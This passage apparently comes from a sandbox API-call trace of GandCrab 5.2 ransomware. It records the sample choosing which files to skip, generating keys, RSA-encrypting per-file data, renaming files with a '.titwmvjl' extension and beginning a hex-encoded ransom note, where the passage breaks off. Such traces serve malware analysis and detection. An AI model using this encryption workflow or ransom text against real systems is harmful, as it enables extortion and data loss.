(lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="bootsect.bak") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="boot.ini") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="ntuser.dat.log") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="thumbs.db") returned -1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="ntldr") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="NTDETECT.COM") returned 1 [0085.903] lstrcmpiW (lpString1="RzsjBZcZllXZJRVXtlY.wav", lpString2="Bootfont.bin") returned 1 [0085.903] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav") returned 61 [0085.903] lstrlenW (lpString=".wav") returned 4 [0085.903] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.903] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0085.903] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.904] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.904] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rzsjbzczllxzjrvxtly.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.904] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.904] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.905] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.905] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.905] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.907] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.908] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.908] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.908] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.908] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.908] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.908] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.910] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.910] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.910] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.910] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.911] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.911] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.911] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.913] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503738) returned 1 [0085.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.913] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.913] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.914] GetLastError () returned 0x0 [0085.914] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.914] CryptDestroyKey (hKey=0x503738) returned 1 [0085.914] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.914] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.914] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.914] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.916] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0085.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.916] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.916] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.917] GetLastError () returned 0x0 [0085.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.917] CryptDestroyKey (hKey=0x5036f8) returned 1 [0085.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.917] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.917] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.918] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.918] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x3bf8, lpOverlapped=0x0) returned 1 [0085.934] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffc408, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3bf8, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x3bf8, lpOverlapped=0x0) returned 1 [0085.936] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.937] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.942] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.942] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.943] CloseHandle (hObject=0x2b4) returned 1 [0085.943] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rzsjbzczllxzjrvxtly.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\RzsjBZcZllXZJRVXtlY.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\rzsjbzczllxzjrvxtly.wav.titwmvjl"), dwFlags=0x1) returned 1 [0085.944] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.945] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.945] lstrcmpW (lpString1="Sd227.mp3", lpString2=".") returned 1 [0085.945] lstrcmpW (lpString1="Sd227.mp3", lpString2="..") returned 1 [0085.945] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Sd227.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3" [0085.945] lstrlenW (lpString=".titwmvjl") returned 9 [0085.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3") returned 47 [0085.945] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.945] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3.titwmvjl") returned 56 [0085.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3") returned 47 [0085.945] lstrlenW (lpString=".mp3") returned 4 [0085.945] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.945] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0085.945] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0085.945] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3") returned 47 [0085.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3") returned 47 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="desktop.ini") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="autorun.inf") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="ntuser.dat") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="iconcache.db") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="bootsect.bak") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="boot.ini") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="ntuser.dat.log") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="thumbs.db") returned -1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="ntldr") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="NTDETECT.COM") returned 1 [0085.946] lstrcmpiW (lpString1="Sd227.mp3", lpString2="Bootfont.bin") returned 1 [0085.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3") returned 47 [0085.946] lstrlenW (lpString=".mp3") returned 4 [0085.946] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.946] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0085.947] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.947] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.947] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sd227.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.947] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.948] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.948] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.949] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.950] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.950] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.951] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.951] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.951] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.951] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.951] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.951] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.951] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.953] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.953] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.953] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.953] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.953] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.954] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.954] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.954] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.956] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0085.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.957] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.957] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.957] GetLastError () returned 0x0 [0085.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.958] CryptDestroyKey (hKey=0x5036f8) returned 1 [0085.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.958] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.958] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.960] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503638) returned 1 [0085.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.960] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.960] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.961] GetLastError () returned 0x0 [0085.961] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.961] CryptDestroyKey (hKey=0x503638) returned 1 [0085.961] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.961] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.961] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.961] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.962] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x66a5, lpOverlapped=0x0) returned 1 [0085.975] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff995b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.975] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x66a5, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x66a5, lpOverlapped=0x0) returned 1 [0085.976] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.977] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.981] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.981] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.981] CloseHandle (hObject=0x2b4) returned 1 [0085.982] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sd227.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sd227.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sd227.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0085.983] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.983] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.983] lstrcmpW (lpString1="Skype", lpString2=".") returned 1 [0085.983] lstrcmpW (lpString1="Skype", lpString2="..") returned 1 [0085.983] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Skype" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype" [0085.983] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\" [0085.983] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0085.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.983] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.984] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.984] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0085.984] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.984] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.984] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.984] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\\\TITWMVJL-DECRYPT.txt") returned 65 [0085.984] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0085.985] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x